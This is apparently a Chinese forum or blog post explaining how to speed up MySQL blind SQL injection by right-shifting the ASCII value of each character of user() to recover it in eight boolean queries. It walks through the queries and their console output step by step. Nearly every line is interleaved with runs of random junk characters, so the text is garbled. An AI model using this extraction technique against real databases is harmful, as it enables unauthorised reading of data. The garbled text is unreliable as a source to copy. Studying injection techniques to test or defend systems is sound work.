关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位


1 c6 R+ R3 N0 S' m3 j
& G' g9 I# V5 D+ G下面将以查询mysql数据库当中user()的第一位为例:



( d1 [5 }% l2 s  V4 X" Yps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)
& z' W, O  X4 d
* u" Z* @: c, G( f. s2 M' |2 F
5 ^  ?$ a1 b5 e. Q
首先执行如下sql语句:
/ L( k" b9 a" ~, G6 K/ b( D
* a3 B% I3 J5 [- [

mysql> select (ascii((substr(user(),1,1))) >> 7)=0;
7 }4 A& w9 |5 R( ~
9 g4 H) u) H" }3 i& M

1 `  t- V- F7 {) H: V我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的
6 G+ I+ k' M: m9 t6 h


第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1
7 V; n$ |% ^+ x7 t! f" t/ ^, g/ j! v
2 F( I! @7 n* o- F. D

% S4 S4 S" R9 v: h9 e5 P2 j& |如果运算结果为1,说明第一位为0,不为1



+————————————–+
2 n5 M- Z+ Q/ m4 f: z' x
| (ascii((substr(user(),1,1))) >> 7)=0 |

: s7 L2 _6 H2 n7 ^+————————————–+
+ _) ~% ~6 f# N$ N
| 1 |
9 S+ K& z/ V1 _3 w" i, n0 Q- n
6 d* g# M: @0 {+————————————–+

  u% j2 Z! l) i5 Q0 y/ q1 row in set (0.00 sec)
# ?2 f# y- c% S# t% Y( b
这样我们就确定这个8bit的ascii的第一位为0
$ T5 t2 V  I; Q) S* p

7 |) o1 `$ z9 x0 U/ `! S
第二次我们来做6次右偏移来确定前两位
( |' V0 C/ V* w( K8 {0 V

3 T8 k- K5 W/ u' y6 y. h2 y: u
, o! U5 M7 J1 M: {. _+ ]( \前两位可能是01或00,即依然可以与0做比较,
& K: _7 t* A) m9 `5 f# B
mysql> select (ascii((substr(user(),1,1))) >> 6)=0;

+————————————–+

| (ascii((substr(user(),1,1))) >> 6)=0 |
; Q% Y, ^+ p# N* L
1 R6 \4 m  Q/ V+————————————–+
; o0 x' B- h- v8 e4 Z# v4 H' [
| 0 |
1 a, f# S6 b9 d& H+ k2 U
+————————————–+
2 u$ `2 ~$ C& J3 v% Y$ ]" J
' R' \1 O$ a% U, ?( }( u1 row in set (0.00 sec)
9 R# E3 y9 m9 j0 n  c7 @
- b* N2 U/ }& @( K- f
$ n( x5 Z' A0 [8 Q
8 {4 D8 i/ W. L( D结果为0,即第二位为1
8 r, w* [; B: t3 T& {& |  X
0 D8 d. T. G- ^. G& U
( O# @6 J- x& o; a2 T) r5 v
5 V1 S! B, I+ a' N& Y3 @开始猜测前三位为010或011
" S- g" z6 H3 N. C. y$ \$ l0 W- I$ z0 b


6 W( F; d8 E' q: ?( \4 l让我们看看010和011的ascii码是多少
) `. N. u5 Y' A- F- e

0 l  `  x, d5 H0 ^, ^3 K4 H
9 w; U' I' C$ a  ^. a: w分别查询select b’011′ select b’010′


5 {. K  s7 ?- Z9 M! G3 {2 X" ~
获得结果 010 = 2 011 = 3

4 J# e, B+ i! e: ^7 B9 V
' e8 L( D/ @0 o2 N$ }% r! u
执行如下sql:
6 d3 P, |' l' y4 B, k, n6 m8 e$ n
! L5 T. h' s7 l! ]7 j4 `
7 S1 \5 m2 A; K! W# s( M  C5 q3 R
0 B6 b: D$ n& C; Q( \& `mysql> select (ascii((substr(user(),1,1))) >> 5)=2;
& n+ E: r- A8 b# r9 I8 f9 S
+————————————–+
9 s5 y0 X4 j- D" }5 R7 b- \
; F) t& I! G# G4 C( f| (ascii((substr(user(),1,1))) >> 5)=2 |
2 ~7 B$ G# [+ I8 g3 ?* ~' O% ]) b
8 m$ o  @' n4 @5 Y) Y( T/ T+————————————–+

| 0 |
- b: _& J2 i) X" I3 s9 a/ _5 q
: S3 r, B% b- M. N% c3 w+————————————–+

即前三位不为010,而是011
% l0 J" W5 d# _& L& b' \, e


直到获得最后一位


& v, s9 G+ j4 H+ `
最终结果为:01110010



5 L1 ?3 _* X8 M0 \' c转换一下:
+ a* g$ y. _& C& x% _! w2 p( B

: S# K# n4 w) {/ [4 F; e
select b’01110010′
' o+ @5 T% Z- ?2 ~9 l$ F
, L, @; b) b' B
6 r- B' U$ X& `  K3 ^
查询结果
7 [, [, R# S" S* J( B! O
3 F- U3 ?  Q; ]: ~" H$ j* \
: S. u( `5 Z; c4 w
+————-+

1 T6 T  ?: n" Y: }| b’01110010′ |

+————-+

| r |

7 K' U" [/ G0 ~% E3 B+————-+
% }6 G8 ?' ^# m$ t6 C! O- \; s
; V4 y; t) A7 m) g1 row in set (0.00 sec)
6 o$ B6 G) R3 V1 ]$ a1 v: u

) ?! c# |- v  E5 }. l! O
# @; z: V! s6 r- ~  \5 {这样我们就获得了user()的第一位.其它位依此类推
5 U5 I- `3 y2 g  f% ], a
9 {4 W7 e+ O& l) P' C/ X* d8 I